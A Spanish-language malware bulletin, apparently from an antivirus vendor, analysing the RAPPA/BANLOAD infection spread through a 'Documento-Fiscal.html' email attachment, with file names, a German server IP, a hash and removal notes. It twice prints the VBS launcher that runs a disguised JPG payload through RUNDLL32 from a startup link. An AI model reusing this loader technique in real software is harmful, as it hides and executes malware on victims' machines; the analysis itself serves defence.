Malware RAPPA que se crea a raiz de abrir un mail con adjunto "Documento-Fiscal.html"msc hotline sat Wednesday, November 26, 2014 Pues lo que inicialmente aparenta ser "solo" un BANLOAD, apoyado por estar escrito en portugués, venir del Brasil y descargar, instalar y ejecutar el fichero Nota-Fiscal_26112014.exe que es detectado inicialmente como un BANLOAD, como hemos informado esta mañana en nuestra Noticia al respecto, nos ha sorprendido con la creación de una carpeta particular dentro de C:\windows, en la que copia 6 ficheros JPG (que no son imagenes) , a saber: eou15qt.jpg --> (es el start.jpg) 1clqu.jpg ----> (es el bho.jpg) 15z38ay6.jpg -> (es el xp.jpg) ad9dirh.jpg --> (es el w7.jpg) amz18pt.jpg --> (es el pro.jpg) d6nctz1.jpg --> (es el mod.jpg) Todo ello descargado desde este servidor de Alemania: 188.138.94.205 DE Germany, Europe 51, 9 PlusServer AG Plus Ademas crea en el menu inicio un link (1zj7vc.lnk) que ejecuta un VBS (b6m10hh.vbs) que apoyado por el RUNDLL32.EXE le permite ejecutar los indicados JPG (que no son tal): Contenido del VBS WScript.sleep 120000 strCommand = "RUNDLL32.eou15qt.jpg ExtractAndRun" Set WshShell = WScript.CreateObject("WScript.Shell") Set objExec = WshShell.Exec(strCommand) Los nombres y ficheros indicados son los que nos ha creado, no necesariamente fijos. Toda una historia, que suponemos aun no ha terminado... De momento, con el ELISTARA 31.10 de hoy, detectamos y eliminamos carpeta y contenido de dicho engendro, con lo que esperamos deshacer sus malas intenciones. saludos ms, 25-11-2014 NOTAS ADICIONALES SOBRE EL "b6m10hh.vbs" Y "*.jpg" INDICADAS EN COMENTARIOS DE VIRUSTOTAL: SHA256: 65c3519a457dadaf82a10abe2bd067f1d2c8acea61afe62a30b58b1abb7ea087 Nombre: b6m10hh.vbs Detecciones: 0 / 56 Fecha de análisis: 2014-11-26 13:49:12 UTC ( hace 0 minutos ) Parte del malware RAPPA es un VBS que usa para ejecutar JPG que no son imagenes, segun este script: WScript.sleep 120000 strCommand = "RUNDLL32 C:\WINDOWS\jbqy\eou15qt.jpg ExtractAndRun" Set WshShell = WScript.CreateObject("WScript.Shell") Set objExec = WshShell.Exec(strCommand) controlado a partir de ELISTARA 31.10 ______ *.JPG (PARTES DEL MALWARE RAPPA) Solo el fichero ejecutable "Fiscal_26112014.exe" es detectado por virustotal como BANLOAD Los demas ficheros, los 6 JPG, el VBS y demás, a horas de ahora no los detecta nadie. ms. |
RSS Noticias RSS Articulos RSS Descargas>> Compartircomparte con tus amigos, zonavirus.com |